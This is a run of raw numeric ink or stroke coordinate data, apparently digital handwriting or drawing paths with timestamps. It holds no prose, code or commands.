0,34 0 0,-27-2 0,19-1 0,6-2 0,11-5 0,-15 6 0,-1 0 0,12-5 0,-6 8 0,-8-5 0,-12 11 0,11-11 0,-26 12 0,10-12 0,-25 6 0,-1-1 0,-14 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14:55:35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24575,'20'0'0,"13"0"0,-8 0 0,7 0 0,-19 0 0,0 0 0,-1 0 0,7 0 0,8 0 0,-6-6 0,5-1 0,-14 0 0,-4-5 0,-3-2 0,-10 5 0,-3-3 0,-16 12 0,8 0 0,-9 0 0,12 0 0,0 0 0,0 0 0,0 0 0,6 6 0,-5 12 0,5-2 0,0 8 0,1 1 0,6-2 0,0 11 0,0 6 0,0 3 0,0 1 0,0-4 0,0-13 0,0 0 0,6-2 0,1-10 0,12 2 0,1-16 0,0 5 0,16-6 0,-12 0 0,21 0 0,-3 0 0,1-12 0,5-4 0,-13-17 0,-3 5 0,-6-5 0,0 7 0,-12-1 0,4 12 0,-5-15 0,1 26 0,-1-13 0,-8 17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14:55:38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24575,'0'13'0,"0"0"0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-12 0,0-14 0,6-3 0,1-9 0,6 0 0,0 2 0,0-4 0,-5 1 0,4 12 0,-5-11 0,6 11 0,-6-5 0,-2 6 0,1 0 0,-4 0 0,9 0 0,2-12 0,1 15 0,-1-13 0,-2 22 0,-3-5 0,4 6 0,-4 6 0,-3 1 0,1 6 0,1 5 0,0-3 0,-1 3 0,0 12 0,-5-7 0,5 8 0,-6-12 0,0-6 0,0 0 0,0 0 0,0 0 0,0-1 0,6 1 0,-5 0 0,11-6 0,-11-1 0,5-6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4:36:48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24575,'60'0'0,"16"0"0,-18 0 0,2 0 0,38 0 0,-25 0 0,1 0 0,25 0 0,-9 0 0,-14 0 0,-24 0 0,-21 0 0,-12 6 0,-13 1 0,-6 12 0,-12 15 0,-4-3 0,-15 35 0,-30 7 0,23-22 0,-3 2 0,-7 1 0,-4-1 0,-1-3 0,1-2 0,11-12 0,3-2 0,-16 24 0,40-35 0,39-5 0,29-15 0,8-6 0,29 3 0,-15 0 0,3 0 0,-14 0 0,-2 0 0,-10 4 0,0 0 0,5-3 0,0 0 0,36 6 0,-28 0 0,1-6 0,-40 11 0,-15-5 0,-12 18 0,0 3 0,-7 6 0,-7-1 0,-1-5 0,-12 33 0,11-26 0,2 24 0,8-28 0,55-8 0,41 17 0,7-20 0,-36-2 0,-4 0 0,-8-8 0,4 14 0,-37-9 0,2 5 0,-25 13 0,-29 11 0,-13 18 0,12-24 0,-2 0 0,-22 30 0,16-11 0,25-22 0,14-11 0,12-17 0,1-1 0,6-6 0,0 0 0,-1-6 0,1 5 0,0-5 0,-6 6 0,-1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14:55:39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0 249 24575,'0'4'0,"0"-1"0,0 16 0,0-6 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,6 0 0,-5 0 0,11-1 0,-5 7 0,6-5 0,0-1 0,0-7 0,0-6 0,-1 0 0,-4-6 0,-3-8 0,1-7 0,-4-7 0,11-21 0,-5-16 0,7 8 0,-1-24 0,0 42 0,0-9 0,-7 21 0,5 14 0,-5 7 0,6 6 0,-6 0 0,-1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14:55:40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24575,'0'28'0,"0"0"0,0 6 0,0-5 0,0 5 0,0-1 0,0-10 0,0 2 0,0-6 0,0-5 0,0 11 0,0-10 0,0 4 0,0-6 0,0 6 0,0-5 0,0 5 0,0-6 0,0-6 0,0-2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14:55:42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53 150 24575,'5'-16'0,"15"-9"0,-3 16 0,9-17 0,-13 11 0,0 1 0,0 3 0,0 3 0,0-5 0,0 6 0,-1 1 0,1 6 0,6 0 0,1 0 0,6 0 0,-1 0 0,1 0 0,11 0 0,-14 0 0,7 0 0,-17 0 0,0 6 0,0 1 0,0 6 0,0 6 0,-1 1 0,-4 0 0,3-2 0,-10 1 0,5 1 0,-6 6 0,0-1 0,0 8 0,-6-6 0,-1 7 0,-12-8 0,3 1 0,-3-7 0,-18 18 0,18-21 0,-24 13 0,28-22 0,-15 3 0,14-10 0,-14 5 0,3-6 0,-8 0 0,7 0 0,-28 0 0,18 0 0,-11 0 0,19 0 0,23 0 0,1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14:55:02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24575,'86'0'0,"-25"0"0,4 0 0,6 0 0,3 0-2490,18 0 1,3 0 2489,0 0 0,5 0 0,-25 0 0,6 0 0,1 0 0,-7 0 0,-3 0 0,-4 0 0,3 0 0,25 0 0,5 0 0,-2 0 0,-11 0 0,-2 0 0,-8 0 0,-7 0 0,0 0 0,11 0 0,8 0 0,-7 0 314,-7 0 1,0 0-315,7 0 0,7 0 0,0 0 0,-2 0 0,-1 0 0,-1 0 0,-2-1 0,-1 0 0,-1 3 0,-5 4 0,0 3 0,-6 0 494,9 0 1,-3 3-495,9 9 0,-1 0 0,-12-6 0,-4-4 0,-15-2 0,2-1 0,31-1 0,-3 0 0,0 2 0,8-4 0,6-1 0,-35 0 0,-1-1 0,23-2 0,3-2 0,-12 1 0,1 0 0,16 0 0,-4 0 0,-38 0 0,-2 0 1278,26 0 1,-2 0-1279,5 0 0,-2 0 799,10 0-799,-22 0 5,-4 6-5,-2 2 0,-38-1 0,5 5 0,-10-11 0,-3 11 0,-6-5 0,-6 6 0,0-1 0,20-4 0,14-3 0,22-12 0,9-2 0,29-14 0,-22 4 0,21 3 0,-17-5 0,12 11 0,-21 2 0,-1 1 0,23 0 0,9 1 0,-42 5 0,-23-6 0,15 7 0,-20 0 0,7 0 0,20 0 0,-5 0 0,29 0 0,-25 0 0,8 0 0,-8 0 0,-5-6 0,7-2 0,0-6 0,-13 6 0,16-4 0,-28 11 0,14-5 0,-14 6 0,-4 0 0,5 0 0,-12 0 0,23 0 0,-11 0 0,14 0 0,-13 0 0,10 0 0,-12-6 0,41-3 0,-50 1 0,18 2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14:55:05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24575,'74'0'0,"13"0"0,-16 0 0,4 0-573,-1 0 1,4 0 572,-1 0 0,6 0 0,-4 0-1462,12 0 1,1 0 1461,-15 0 0,4 0 0,-1 0 0,-1 0 0,0 0 0,2 0-180,6 0 1,3 0 0,3 0 179,-10 0 0,4 0 0,2 0 0,-1 0 0,2 0 0,0 0 0,0 0 0,0 0 0,-2 0 0,-1 0 0,0 0 0,-1 0 0,-1 2 0,-1 0 0,-1 0 0,-3 1-735,8 0 1,-4 0 0,-2 2 734,-11 1 0,-1 0 0,2 2 0,18 0 0,4 2 0,-6 0-39,3 4 1,2 0 38,1-2 0,8 0 0,-8 1 0,2 5 0,-5-1 0,-25-4 0,1-1 0,-1-1 0,31 0 0,3-2 0,-15-3 0,2 0 0,-3-3 0,13-2 0,-3-2 548,4 1 1,-6 0-549,-39 0 0,-3 0 533,2 0 0,-1 0-533,23 0 1269,-4 0 1,2 0-1270,-20 0 0,-1 0 0,10 0 0,-2 0 0,37 0 641,-1 0-641,4 0 0,-8 0 0,2 0 0,-39 0 0,0 0 582,21 0 1,-5 0-583,-4 7 378,-7 2-378,8-1 0,16 13 0,-30-10 0,21 4 0,-37-2 0,29-5 0,-31-1 0,16 0 0,-25-7 0,-12 0 0,6 0 0,5 0 0,3 0 0,20 0 0,1 0 0,39 0 0,-30 0 0,27 0 0,-55 0 0,1 0 0,-18 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-6 0 0,-1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14:56:13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0 385 24575,'0'-13'0,"0"-7"0,0 5 0,0-11 0,0 5 0,0 0 0,0 2 0,0 6 0,6 0 0,1 0 0,6-6 0,0-2 0,0 1 0,-5 0 0,9 1 0,-14 5 0,8-5 0,-5 0 0,-5 5 0,11-5 0,-5 12 0,6 1 0,0 6 0,0 0 0,-1 0 0,1 0 0,0 0 0,6 0 0,1-6 0,0 5 0,-2-5 0,-5 6 0,0 0 0,0 0 0,0 0 0,0 0 0,-6 0 0,-1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14:56:16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5 170 24575,'12'0'0,"1"0"0,0 0 0,6 0 0,-5 0 0,5 0 0,-7 0 0,1-5 0,-5-3 0,3 1 0,-4-5 0,6 5 0,0-6 0,0 6 0,0-5 0,-1 5 0,1 0 0,6-10 0,-5 14 0,5-15 0,-6 11 0,0-6 0,-1 6 0,-4-5 0,-9 11 0,-6-5 0,-6 6 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-6 0 0,5 0 0,-5 0 0,0 0 0,5 0 0,-5 0 0,0 0 0,5 6 0,-5 1 0,6 6 0,0-6 0,6 4 0,1-4 0,0 6 0,-1-6 0,-1 5 0,3-5 0,5 6 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,5-6 0,3 5 0,4-5 0,1 0 0,0 4 0,0-3 0,-6 4 0,5-4 0,-5 3 0,6-4 0,-1 0 0,7 5 0,-5 1 0,5 1 0,0 5 0,-11-7 0,9-4 0,-10 3 0,6-10 0,0 11 0,0-11 0,0 11 0,5-11 0,2 5 0,6-6 0,0 0 0,-6 0 0,4 0 0,-9 0 0,9 0 0,-10 0 0,5 0 0,-6 0 0,-6 0 0,-1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14:56:18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24575,'0'19'0,"0"8"0,0-4 0,0 9 0,0-5 0,0-5 0,0 10 0,0 8 0,0-8 0,0 13 0,0-24 0,0-2 0,0-1 0,0 2 0,0 6 0,0 0 0,0-1 0,0 1 0,6-6 0,-5-1 0,11-12 0,-5-1 0,0-1 0,5 2 0,-5 1 0,6-3 0,5 7 0,2-4 0,0 5 0,-1-7 0,6-6 0,3 0 0,19 0 0,-17 0 0,19 0 0,-32 0 0,14 0 0,-12 0 0,-5 0 0,-1 0 0,-7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14:56:19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24575,'20'0'0,"1"0"0,19 0 0,-9 0 0,10 0 0,-14 0 0,0 0 0,0 0 0,-5 0 0,-3 0 0,-6 0 0,0 0 0,11 0 0,-8 0 0,8 0 0,-11 0 0,0 0 0,0 0 0,-6 0 0,-1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14:56:36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643 1 24575,'-19'0'0,"5"0"0,-5 5 0,0 8 0,5 2 0,-18 21 0,16-18 0,-9 13 0,6-13 0,4-3 0,-3 3 0,4 7 0,1-9 0,-1 10 0,1-8 0,0-3 0,0 3 0,0 1 0,0 1 0,0 5 0,0-5 0,6-1 0,1-6 0,6 0 0,6-6 0,14-1 0,2-6 0,5 0 0,10 0 0,-20 0 0,13 0 0,-17 0 0,0 0 0,0 0 0,0 5 0,-1 3 0,1 4 0,0 1 0,0 0 0,0 0 0,-6 0 0,-1 0 0,-6 0 0,0-1 0,5-4 0,-3 3 0,4-4 0,-6 6 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-6 0 0,-1-6 0,-6-1 0,0-1 0,-1-3 0,1 3 0,0 1 0,0-4 0,0 3 0,-5 1 0,3-4 0,-4 9 0,1-10 0,3 11 0,-10-11 0,5 5 0,0-6 0,-6 0 0,6 0 0,-13 0 0,12 0 0,-4 0 0,0 0 0,9 0 0,-8 0 0,11 0 0,0 0 0,-6 0 0,-1 0 0,-1 0 0,-3 0 0,9 0 0,2 0 0,8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4:37:08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24575,'48'0'0,"-3"0"0,6 0 0,-10 0 0,-8 0 0,-3 0 0,-3 0 0,-8 0 0,-6 0 0,0 0 0,-6 5 0,-1 8 0,-6 2 0,0 9 0,0-10 0,0 10 0,-14 5 0,-2 0 0,-13 7 0,-8 1 0,6 1 0,-28 22 0,25-19 0,-27 26 0,36-36 0,-1 8 0,21-20 0,10-12 0,2 4 0,25-9 0,-7 4 0,15 0 0,8-5 0,-7 12 0,9-11 0,-15 5 0,35 5 0,-38-9 0,24 14 0,-51-10 0,-5 6 0,0 0 0,0 6 0,-5 1 0,-3 5 0,-11 7 0,5 1 0,1-6 0,7-3 0,6-11 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,17 13 0,-7-10 0,21 22 0,-11-15 0,-5 10 0,-4-6 0,-11 0 0,0-1 0,0 1 0,0-6 0,0-1 0,0-6 0,0 0 0,0-1 0,6-4 0,1-3 0,12-5 0,-5 0 0,11 6 0,2-4 0,2 10 0,3-5 0,-18 12 0,-2-5 0,-12 23 0,0-20 0,-12 26 0,9-20 0,-15 10 0,16-12 0,-3 9 0,5-9 0,11 17 0,4-10 0,18 5 0,-6-7 0,6-6 0,-13-7 0,-8-2 0,0-9 0,-11 3 0,5-5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14:56:38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0 24575,'-19'0'0,"4"0"0,-3 0 0,5 0 0,-6 0 0,4 0 0,-10 0 0,10 0 0,-10 0 0,10 0 0,-4 0 0,6 0 0,0 0 0,-6 0 0,5 0 0,-5 6 0,6 1 0,0 6 0,0 0 0,0 0 0,0 0 0,6-1 0,-5 1 0,11 0 0,-5 0 0,6 0 0,0 5 0,0-3 0,0 3 0,0 1 0,0 1 0,0 0 0,0 22 0,0-4 0,12 16 0,-3-6 0,10-8 0,-12-6 0,4-1 0,-9-13 0,3-2 0,-5-5 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 6 0,0-5 0,0 5 0,0-6 0,0-1 0,6-4 0,7 3 0,-4-9 0,2 3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14:56:40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0 106 24575,'20'0'0,"-5"0"0,16 0 0,-15 0 0,10 0 0,-1-5 0,-3-3 0,11 1 0,-13 1 0,6 6 0,-6-12 0,0 9 0,-1-10 0,-6 13 0,0-6 0,6-1 0,1 0 0,5-5 0,1 11 0,-6-11 0,-1 11 0,-12-5 0,-1 6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14:56:41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24575,'0'13'0,"0"5"0,0-3 0,0 3 0,0 8 0,0-10 0,6 9 0,-4-7 0,9-3 0,-9 10 0,3-5 0,1 1 0,-5-2 0,5 0 0,6 14 0,-3 16 0,5-12 0,-8 1 0,0-8 0,1-7 0,0 14 0,4-17 0,-9-2 0,3-5 0,-5-6 0,0-1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14:56:44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0 241 24575,'0'-28'0,"0"-4"0,6 18 0,1-5 0,6-1 0,0 12 0,1-17 0,-1 21 0,1-8 0,4 0 0,-4 10 0,5-16 0,-6 17 0,5-11 0,-3 11 0,9-11 0,-10 11 0,16-11 0,-14 11 0,8-5 0,-11 6 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-6 6 0,-1 1 0,-6 6 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,-6-6 0,-1 5 0,-7-5 0,1 0 0,6 4 0,-4-9 0,3 4 0,-5-1 0,-5 2 0,3 1 0,-9 3 0,9-10 0,2 11 0,-4-11 0,8 5 0,-10 0 0,6-5 0,6 11 0,-5-11 0,5 5 0,-6-6 0,0 0 0,0 0 0,6 6 0,-5-5 0,11 10 0,-5-3 0,6-1 0,0-2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15:00:14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24575,'58'0'0,"0"0"0,19 0 0,-18 0 0,-2 0 0,8 0 0,9 0 0,-22 0 0,2 0 0,2 0 0,1 0 0,-6 0 0,-1 0 0,2 0 0,-2 0 0,28 0 0,-25 0 0,2 0 0,-3 0 0,-2 0 0,46 0 0,-35 0 0,1 0 0,-1 0 0,3 0 0,22 0 0,1 0 0,-25 0 0,1 0 0,23 0 0,-2 0 0,-28 0 0,-1 0 0,13 0 0,-2 0 0,27 0 0,-29 0 0,-15 0 0,-2 0 0,-1 0 0,-17 0 0,-4 0 0,-20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15:00:16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1 24575,'-13'0'0,"0"0"0,0 0 0,-7 0 0,6 0 0,-6 0 0,0 0 0,6 11 0,-13-2 0,12 10 0,-4-6 0,6-6 0,0 5 0,5-5 0,-3 0 0,4 5 0,-1-5 0,3 6 0,5-1 0,11 1 0,-2 0 0,15 0 0,-4 6 0,7-5 0,0 6 0,13 0 0,-9-5 0,9 5 0,-6 6 0,-5-9 0,-2 9 0,-7-13 0,11 12 0,-3 2 0,12 6 0,-2-13 0,-10-8 0,4-12 0,0 0 0,-16 0 0,3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15:00:17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9108,'0'38'0,"0"-3"5120,0 1-5120,0 20 2678,0-14-2678,0 8 0,0 0 1594,0-3-1594,0 46 6075,0-26-6075,0 5 0,0-6 0,0-23 0,0-24 0,0-13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15:00:19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24575,'5'-7'0,"3"1"0,4 6 0,1 0 0,0 6 0,0 13 0,0-4 0,-6 10 0,5-7 0,-5-3 0,6 20 0,-1-18 0,1 13 0,0-11 0,-6-5 0,5 12 0,-5 0 0,7 2 0,-7-3 0,4-6 0,-9 0 0,4-5 0,-1 10 0,-3-9 0,3 3 0,-5-5 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,-11 0 0,2-6 0,-10 10 0,6-14 0,6 14 0,14-15 0,16 4 0,35-6 0,1 0 0,8 0 0,16 0 0,-31 0 0,15 0 0,-19 0 0,-18 0 0,9 0 0,-19 0 0,-7 0 0,-8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15:00:21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24575,'20'-6'0,"7"-8"0,-5-1 0,4 2 0,-8 1 0,-4 11 0,5-5 0,-6 6 0,6 0 0,-4 0 0,5 0 0,-8 0 0,1 0 0,0 0 0,0 0 0,-6 6 0,-1 1 0,0 6 0,-5-1 0,5 1 0,-6 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-6-1 0,-1 7 0,-6-10 0,5 8 0,3-10 0,10 0 0,3-1 0,4-6 0,1 0 0,7 0 0,1 0 0,19 0 0,4 0 0,-8 0 0,21 0 0,-32 0 0,20 0 0,-25 6 0,-2 6 0,-10 20 0,-3 2 0,-5 5 0,0-8 0,0-5 0,0 0 0,-5-1 0,-15 2 0,-2-7 0,-18 5 0,6-10 0,-6 10 0,6-10 0,8 3 0,7-11 0,6 11 0,6-10 0,1 5 0,6-7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15:01:04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1405 1 24575,'-64'28'0,"-2"5"0,4 36 0,-1-14 0,24-16 0,-4 2 0,-17 11 0,-1 1 0,20-13 0,0 0 0,-19 16 0,-2 0 0,14-16 0,4-2 0,-23 33 0,23-36 0,-2 0 0,-6 8 0,2-1 0,-18 7 0,18-17 0,4-5 0,8-5 0,2-2 0,8-4 0,-12 10 0,21-11 0,-24-1 0,38-69 0,-13 40 0,18-46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4:28:39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24575,'0'84'0,"0"-31"0,0 2 0,0 42 0,0-40 0,0 2 0,0 0 0,0 0 0,0-6 0,0 3 0,0 22 0,0 5 0,0 2 0,0 3-593,0 10 0,0 2 593,0-26 0,0 1 0,0 1 0,0 1 0,0 0 0,0-1 0,-1 25 0,2-3 0,1 1 0,3-1 0,3-5 0,1-2 0,0-4 0,2-1 0,5 0 0,0 1 0,-5 13 0,-2-5 0,0-33 0,0-2 193,-1 12 1,0-1-194,0-12 0,0-2 98,1-7 1,0 0-99,-1 9 0,0-3 0,5 7 0,-12-29 602,6-8-602,-2-13 0,-3-7 0,4-6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15:01:05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24575,'27'0'0,"23"10"0,8 3 0,24 8 0,-10 1 0,2 6 0,-10 5 0,-3 1 0,-13-5 0,0 0 0,14 8 0,1 1 0,-6 2 0,-2-2 0,-12-10 0,1 0 0,17 17 0,1 0 0,-13-15 0,-2-2 0,-2 2 0,-1 2 0,3 2 0,0 2 0,5 4 0,3 3 0,13 15 0,3 2 0,-3-2 0,1 0 0,6 5 0,-3-2 0,-25-15 0,-3-4 0,-4-8 0,-1-3 0,20 13 0,-36-31 0,-3-6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15:01:07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669 0 24575,'-13'0'0,"0"0"0,-12 0 0,9 0 0,-10 0 0,1 0 0,9 0 0,-21 0 0,21 0 0,-15 0 0,11 17 0,0-7 0,7 15 0,1-12 0,5 5 0,-6-4 0,0 5 0,6-6 0,1 0 0,6 0 0,0 0 0,0-1 0,17 1 0,-7 0 0,14-6 0,6 10 0,-7-14 0,9 14 0,-14-15 0,1 9 0,1-4 0,11 12 0,-3-5 0,-3 5 0,-12-6 0,-1-6 0,-11 4 0,5-3 0,-6 4 0,0 1 0,0 0 0,-6-6 0,-1-1 0,-12-6 0,-1 6 0,-1-5 0,3 5 0,-1-6 0,-2 0 0,0 6 0,1-5 0,7 5 0,-12-6 0,3 0 0,-5 0 0,8 0 0,-5 0 0,2 0 0,-17 0 0,12 0 0,-13 0 0,0 0 0,10 0 0,-7 0 0,11 0 0,-2 0 0,2 0 0,8 0 0,10 0 0,3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15:01:09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 0 24575,'-20'0'0,"5"0"0,-5 0 0,1 0 0,4 0 0,-10 0 0,-2 0 0,5 0 0,-16 0 0,16 0 0,-5 0 0,-4 0 0,10 0 0,-5 0 0,1 0 0,11 0 0,1 6 0,1-5 0,5 5 0,0 0 0,-5-5 0,5 10 0,0-3 0,1 4 0,6 1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,5 0 0,-3 0 0,9-1 0,-4 1 0,6-6 0,-5 5 0,3-11 0,-4 11 0,6-5 0,11 12 0,-8-11 0,8 4 0,-17-7 0,5-3 0,1 9 0,7-9 0,5 3 0,1 1 0,-6-5 0,-1 11 0,5-5 0,-8 0 0,8-1 0,0 0 0,-2-5 0,9 5 0,-5-6 0,0 0 0,-6 0 0,4 0 0,-10 0 0,5 0 0,-6 0 0,-6 0 0,-1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14:56:51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24575,'86'0'0,"0"0"0,9 0 0,-29 0 0,-16 0 0,1 0 0,16 0 0,1 0 0,-8 0 0,12 0 0,-17 0 0,14 0 0,13 0 0,-25 0 0,27 0 0,3 0 0,-9 0 0,7 0 0,-13 0 0,-7 0 0,1 0 0,5 0 0,2 0 0,2 6 0,22 9 0,-32-5 0,9 4 0,4-1 0,16-2 0,-16 0 0,3 0 0,-20-2 0,-4-2 0,-5 1 0,0 0 0,7 0 0,-2-1 0,28 1 0,-3 5 0,-18-5 0,-21 0 0,-2-2 0,-2 0 0,-9 1 0,15 0 0,7-1 0,-14-6 0,13 6 0,-19-5 0,-4 5 0,11-6 0,-5 0 0,1 0 0,17 0 0,-2 0 0,0 0 0,-5 0 0,-20 0 0,1 0 0,0 0 0,-6 0 0,4 0 0,-4 0 0,6 0 0,-6 0 0,-1 0 0,-7 0 0,1 0 0,0 0 0,0 0 0,6 0 0,-5 0 0,5 0 0,-1-6 0,-4-1 0,5-1 0,-6 3 0,5-1 0,-3 4 0,3-3 0,-5-1 0,6 4 0,-5-3 0,5-1 0,-12 4 0,-1-3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14:56:53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0 24575,'4'0'0,"-1"0"0,22 0 0,-5 0 0,1 0 0,-2 0 0,-1 0 0,-3 0 0,3 0 0,-5 0 0,0 0 0,0 0 0,0 0 0,5 0 0,-4 0 0,5 0 0,0 0 0,1 6 0,5 1 0,1 6 0,-12 0 0,-2 0 0,-12-1 0,6-4 0,-5 3 0,5-4 0,-1 0 0,-3 5 0,9-5 0,-9 6 0,3 0 0,1 0 0,-4-1 0,3 1 0,1 0 0,-5 0 0,5 0 0,-6 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-6 0 0,-7-6 0,-1 4 0,-5-9 0,-6 10 0,-4-5 0,-19 14 0,-1-6 0,5 5 0,-29 0 0,17-4 0,-10-2 0,24-1 0,-2 0 0,12-4 0,-15 8 0,14-15 0,13 4 0,1-1 0,6-3 0,0 3 0,6 1 0,1 1 0,6 1 0,0-3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14:56:55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24575,'40'0'0,"-6"0"0,16 0 0,-15 0 0,-7 0 0,6 0 0,-11 0 0,8 0 0,-16 0 0,5 0 0,-13-6 0,-2-1 0,-5-6 0,-5 6 0,-3 1 0,-5 6 0,-5 0 0,3 0 0,-4 0 0,1 0 0,-3 0 0,-5 0 0,6 0 0,1 0 0,6 0 0,0 0 0,6 12 0,1 4 0,6 52 0,7-22 0,-6 31 0,12-19 0,-5-17 0,0 0 0,4-16 0,-11-5 0,11 6 0,-5-6 0,6-1 0,-1-1 0,-4-3 0,3-2 0,-4-8 0,6-5 0,0 0 0,6 0 0,-5 0 0,10 0 0,3-6 0,7-1 0,13-14 0,-4 0 0,-8 0 0,-3 8 0,-12 1 0,8 10 0,-8-3 0,-6 5 0,-8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14:56:57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24575,'13'0'0,"0"0"0,-1 0 0,1-5 0,-6-3 0,5 1 0,-11-4 0,11 3 0,-11-5 0,5 0 0,0 6 0,-5-10 0,5 8 0,0-10 0,-5 6 0,10 0 0,-9 0 0,9 6 0,-9-5 0,9 5 0,-9-12 0,9 5 0,-10-5 0,5 6 0,-6 0 0,0-6 0,0 5 0,0-5 0,-6 12 0,5-5 0,-11 11 0,11-11 0,-11 11 0,11-5 0,-5 6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14:56:58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24575,'0'46'0,"0"20"0,0-16 0,0 25 0,0 2 0,0-24 0,0 12 0,0-25 0,0-9 0,0 15 0,0-18 0,0-1 0,0-8 0,0-1 0,0 2 0,0 0 0,0 4 0,0-4 0,12 12 0,-9-11 0,14-2 0,-16-13 0,5-6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14:57:00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1 128 24575,'21'-5'0,"5"3"0,16-17 0,-9 3 0,22-7 0,-32 3 0,11 12 0,-12 2 0,6-7 0,-2 10 0,1-9 0,-1 12 0,-6 0 0,-2 0 0,-10 11 0,-3-2 0,-5 9 0,0-5 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-5-1 0,-3 1 0,-22 6 0,0-4 0,-9 3 0,6-4 0,13-1 0,1-6 0,-6 4 0,10-4 0,-10 0 0,12 5 0,-6-11 0,5 5 0,-5 0 0,6-5 0,6 11 0,-5-11 0,11 11 0,-5-5 0,6 0 0,0-1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14:57:01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24575,'0'61'0,"0"-8"0,0 39 0,0-29 0,0 22 0,0-11 0,0-32 0,0 14 0,0-29 0,0-6 0,0-8 0,0-7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4:28:41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24575,'50'0'0,"0"0"0,45 0 0,-2 0 0,13 0-2507,-15 0 1,6 0-1,-5 0 2507,-17 0 0,-3 0 0,3 0 0,-3 0 0,3 0 0,2 0 0,0 0 103,1 0 1,0 0-1,0 0 1,0 0-104,20 0 0,-1 0 0,2 0 0,-17 0 0,2 0 0,0 0 0,-4 0 0,8 0 0,-3 0 0,1 0 0,13 0 0,2 0 0,-7 0 0,-5 0 0,-1 0 0,-3 0 0,6 0 0,-4 0 0,12 0 0,-8 0 0,-21 0 0,0 0 0,-2 0 0,5 0 0,-6 0 0,2-1 0,0 2 462,0 5 1,5 2 0,-5 1-463,10-1 0,-4 3 0,-3 5 0,-6 1 0,8-2 0,8 11 0,-29-16 3795,34 17-3795,-52-14 1765,4-5-1765,-13-3 158,-12 1-158,-2 1 0,-12 12 0,0 10 0,3 16 0,2 13 0,1 9 0,1 9 0,0 0 0,-3-4 0,-1 1 0,2 3-291,3 21 1,2 6 0,-2-6 290,-4-24 0,-1-3 0,0-1 0,3 2 0,0-1 0,1-1-2,1 26 1,2-3 1,1-8 0,2-5 0,-1-11 0,1-5 0,11 28 0,-3-15 0,0-1 0,-1 2 0,-6-19 0,-1-4 0,0-8 0,-12-25 871,6 5-871,-7 0 3,5-6-3,-3-1 0,4-7 0,-6 1 0,0 0 0,0 0 0,0 6 0,0 1 0,0 0 0,0 11 0,0 4 0,0 7 0,0 6 0,0-1 0,0 2 0,0 15 0,0-19 0,-6 27 0,-2-39 0,1 17 0,-10-35 0,-4-4 0,-36-11 0,-29 0 0,23 1 0,-6-2 0,-19-3 0,-3-1-261,4-1 1,-2 0 260,14 2 0,-3 0 0,1 1 0,2-1 0,1 1 0,0 1 0,5 1 0,-1 1 0,-4 1 0,-8 0 0,-7 2 0,-1 0 0,3-1 0,-8-2 0,2 0 0,-5 2-340,21 1 0,-5 1 1,-2 1-1,2 0 1,4-2 339,-22-2 0,6-1 0,-1 1 0,-1 3 0,0 0 0,0-1 0,1-2 0,0-2 0,7 1 0,3 0 0,0 0 0,-9 0 0,-9 0 0,11 0 0,13 0 0,5 0 0,-9 0 0,-2 0 0,-18 0 0,11 0 0,21 0 0,-3 0 0,-5 0 0,22 0 0,2 0 0,-45 0 476,13 6-476,59 1 0,16 0 0,12-1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14:57:03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68 24575,'4'-13'0,"-1"10"0,16-9 0,-6 12 0,13-6 0,-10 4 0,9-3 0,-1-1 0,-8 4 0,8-4 0,-5 1 0,-5 3 0,10-4 0,-9 6 0,3 0 0,-5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-6 6 0,-1 1 0,-6 6 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 7 0,0-5 0,-6 11 0,5-11 0,-11 4 0,-1-5 0,-1 0 0,-5 0 0,12 0 0,-5-6 0,-1 10 0,-7-8 0,0 4 0,1-2 0,0-4 0,4 0 0,-9 5 0,4-11 0,-13 11 0,5-5 0,-10 0 0,16 4 0,-3-9 0,18 9 0,1-4 0,6 1 0,0-3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15:02:29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0 651 24575,'96'0'0,"-2"0"0,-20-4 0,-1 0 0,11 2 0,4-5 0,1-3 0,8-7 0,-25 7 0,2-1 0,-17-1 0,-3-1 0,33-3 0,-36 8 0,0 0 0,42-15 0,-25 10 0,3 0 0,-5-3 0,2-1 0,-3 5 0,3 1 0,-4 0 0,0-2 0,-2 0 0,16 1 0,-2 0 0,-24 0 0,-1 0 0,22-4 0,4-1 0,5-3 0,1 0 0,-8 3 0,-4 0 0,-14 3 0,-8 0 0,-4-2 0,1 8 0,-9-5 0,27-2 0,-30-1 0,50-6 0,-49 8 0,28-1 0,7 0 0,-12 0 0,26 1 0,-35 6 0,-8-4 0,3 5 0,-27-1 0,6 3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15:02:31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24575,'27'0'0,"21"0"0,1 0 0,6 0 0,1 0 0,-16 0 0,10 7 0,6 7 0,-10 8 0,6 0 0,-3-1 0,-7-1 0,17 3 0,-8-8 0,4 4 0,-21-11 0,-7-1 0,-8-1 0,-1-6 0,2 6 0,0-5 0,-1 10 0,-6-9 0,0 9 0,-1-3 0,-4 4 0,-9-4 0,-12 3 0,-15-9 0,-14 10 0,-7 2 0,-15 9 0,-9 6 0,17-7 0,-32 19 0,46-17 0,-26 17 0,28-9 0,11-16 0,5 7 0,11-16 0,0 12 0,0-5 0,0 10 0,5-9 0,3-2 0,5-8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15:02:33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85 351 24575,'5'-7'0,"10"-12"0,15 1 0,3-8 0,-5 6 0,-1-1 0,-6 0 0,-2 2 0,-6 6 0,-6-6 0,-2 5 0,-5-5 